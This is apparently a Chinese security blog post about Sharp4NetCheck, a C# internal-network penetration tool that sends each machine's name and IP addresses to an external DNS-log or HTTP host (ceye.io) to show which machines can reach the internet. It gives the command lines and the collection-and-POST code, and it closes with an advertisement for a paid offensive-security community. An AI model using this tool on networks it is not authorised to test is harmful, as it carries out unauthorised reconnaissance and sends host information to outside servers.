01阅读须知
此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面
02基本介绍
Sharp4NetCheck 是一款强大的工具,用于自动检测内网中哪些机器可以访问互联网。它通过在 DNS 日志中回显内部 IP 地址和计算机名,实现快速定位可出网机器。
03使用方法
Sharp4NetCheck 可以同时处理多台机器,大大加快了检测速度,支持 DNS 和 HTTP 协议来检查互联网可访问性。
3.1 DNS探测
通过 DNS 检查互联网可访问性。它将机器的名称和 IP 地址发送到指定的 DNS 日志主机
Sharp4NetCheck -dns -host ceye.io
3.2 HTTP探测
通过 HTTP 进行检查。它将机器的名称和 IP 地址发送到指定的 HTTP 主机。
Sharp4NetCheck -http -host/ip ceye.io3.3 综合探测
同时执行 DNS 和 HTTP 检查,确保全面检测。
Sharp4NetCheck -all -host ceye.io
04编码实现
以下是 Sharp4NetCheck 的核心代码部分,每个功能对应一个代码块。下面这个代码块HTTP 检查函数收集机器的名称和 IP 地址,然后将这些信息发送到指定的 URL。具体来看,首先获取计算机名称并初始化一个 NameValueCollection 对象来存储要发送的数据,再遍历 IP 地址,调用 NetCheck.Post 方法,将数据发送到指定的 URL。
public static void http(string url)
{
string machineName = Environment.MachineName;
int num = 1;
NameValueCollection nameValueCollection = new NameValueCollection();
nameValueCollection.Add("host", machineName);
string hostName = Dns.GetHostName();
IPAddress[] hostAddresses = Dns.GetHostAddresses(hostName);
foreach (IPAddress ipaddress in hostAddresses)
{
if (ipaddress.AddressFamily == AddressFamily.InterNetwork)
{
nameValueCollection.Add("ip" + num.ToString(), ipaddress.ToString());
num++;
}
}
NetCheck.Post(url, nameValueCollection);
}
POST 函数将收集到的机器信息发送到指定的 URL。代码通过创建一个 WebClient 实例,再使用 WebClient 的 UploadValues 方法,将数据以 POST 请求的方式发送到服务器。
public static void Post(string url, NameValueCollection postValues)
{
try
{
WebClient webClient = new WebClient();
url = "http://" + url + "/";
byte[] bytes = webClient.UploadValues(url, postValues);
Encoding.ASCII.GetString(bytes);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
Sharp4NetCheck 是一款内网渗透活动中非常有价值的工具,能够快速识别内网中哪些机器可以访问互联网。
05.NET安全星球
星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。
20+个专题栏目涵盖了点、线、面、体等知识面,助力师傅们快速成长!其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等。
我们倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。
扫一扫
542
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
